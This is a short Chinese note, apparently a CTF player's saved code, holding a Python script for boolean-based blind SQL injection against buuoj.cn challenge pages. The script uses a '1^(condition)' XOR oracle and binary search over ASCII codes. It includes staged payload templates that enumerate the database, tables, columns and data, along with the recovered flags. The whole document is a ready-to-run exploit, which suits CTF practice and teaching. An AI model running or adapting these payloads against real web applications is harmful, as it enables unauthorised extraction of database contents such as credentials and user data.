贴个代码,防止忘记
GET 型（布尔盲注：用 `1^(条件)` 的异或结果当作真/假 oracle，再对每个字符的 ASCII 值二分）:
import requests
import time
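# Boolean-based blind SQL injection, GET variant.
#
# The page takes a numeric parameter `stunum`.  Injecting `1^(cond)` turns the
# XOR into an oracle: when `cond` is TRUE, 1^1 == 0 and the lookup for student
# 0 fails, so the page contains `key`; when `cond` is FALSE, 1^0 == 1 and the
# normal record for student 1 is shown.  Each character of the secret is then
# recovered with a binary search over its ASCII code, one request per step.

# Earlier target (search.php) used a different error marker:
# key = "ERR"
# url = "http://bf06151e-232d-4024-8223-6d6171dfd75a.node4.buuoj.cn/search.php?"
key = "student number not exists"
url = "http://6a0bfa86-f4c3-45e5-907e-ba518a2fbf6d.node4.buuoj.cn:81?"

# Bounds of the printable ASCII range that is searched.  They double as
# sentinels: substr() past the end of the string gives '' and MySQL's
# ascii('') is 0, so "no character here" converges to LO; a code outside
# the range (non-ASCII) converges to HI.
LO = 33
HI = 127

# Maximum number of characters to recover (range(1, 60) in the original).
MAX_LEN = 59

# Payload templates, one per enumeration stage; each takes (position, threshold).
# Stage 1 - current database:
#   "id=1^(ascii(substr(database(),%d,1))>%d)"
# Stage 2 - tables in schema `geek`            -> F1naI1y, Flaaaaag
#   "id=1^(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema='geek')),%d,1))>%d)"
# Stage 3 - columns of F1naI1y                 -> id,fl4gawsl // id,username,password
#   "id=1^(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='F1naI1y')),%d,1))>%d)"
# Stage 4 - the data                           -> flag{5ca4b86b-8846-40c7-b9a1-1ea844b31fa9}
#   "id=1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>%d)"
# Current target: column `value` of table `flag` -> flag{dddc2daa-a7a6-aed-b44d-b71197d3f46}
PAYLOAD = "stunum=1^(ascii(substr((select(group_concat(value))from(flag)),%d,1))>%d)"

# Seconds to wait before timing out a single request; the original had no
# timeout and would hang forever on a stalled connection.
TIMEOUT = 10


def probe(position, threshold):
    """Ask the remote oracle whether ascii(secret[position]) > threshold.

    Sends one GET with the injected predicate and returns True when the
    page contains `key`, i.e. when the predicate evaluated TRUE.  Sleeps
    one second per request so the target is not hammered.  The payload is
    appended raw, as in the original; requests re-quotes the unsafe
    characters of the query string (^, >, space) before sending.
    """
    res = requests.get(url + PAYLOAD % (position, threshold), timeout=TIMEOUT)
    time.sleep(1)
    # NOTE(review): a 4xx/5xx answer (rate limit, WAF) contains no `key` and
    # would silently read as FALSE, corrupting the result.  If the target is
    # known to answer 200 on both branches, check res.status_code here.
    return key in res.text


def search_char(position, is_greater=probe):
    """Binary-search the ASCII code of the character at `position` (1-based).

    `is_greater(position, threshold)` must return True iff the code is
    strictly greater than `threshold`.  Returns a value in [LO, HI]: LO
    means "no character" (ascii('') == 0), HI means the code lies outside
    the searched range.
    """
    lo, hi = LO, HI
    while lo < hi:
        mid = (lo + hi) >> 1
        if is_greater(position, mid):
            lo = mid + 1
        else:
            hi = mid
    return hi


def leak(is_greater=probe, max_len=MAX_LEN):
    """Recover up to `max_len` characters, printing the partial result as it grows.

    Stops at the first position whose code hits a sentinel (LO or HI).
    The original tested `mid == 33 or mid == 127` after the loop: the 127
    branch was unreachable (mid is at most 126) and the 33 branch also
    fired when the true character is '"' (34), truncating the result.
    Testing the converged bound `hi` avoids both problems.
    """
    recovered = ''
    for position in range(1, max_len + 1):
        code = search_char(position, is_greater)
        if code in (LO, HI):
            break
        recovered += chr(code)
        print(recovered)
    return recovered


if __name__ == "__main__":
    flag = leak()
    print(flag)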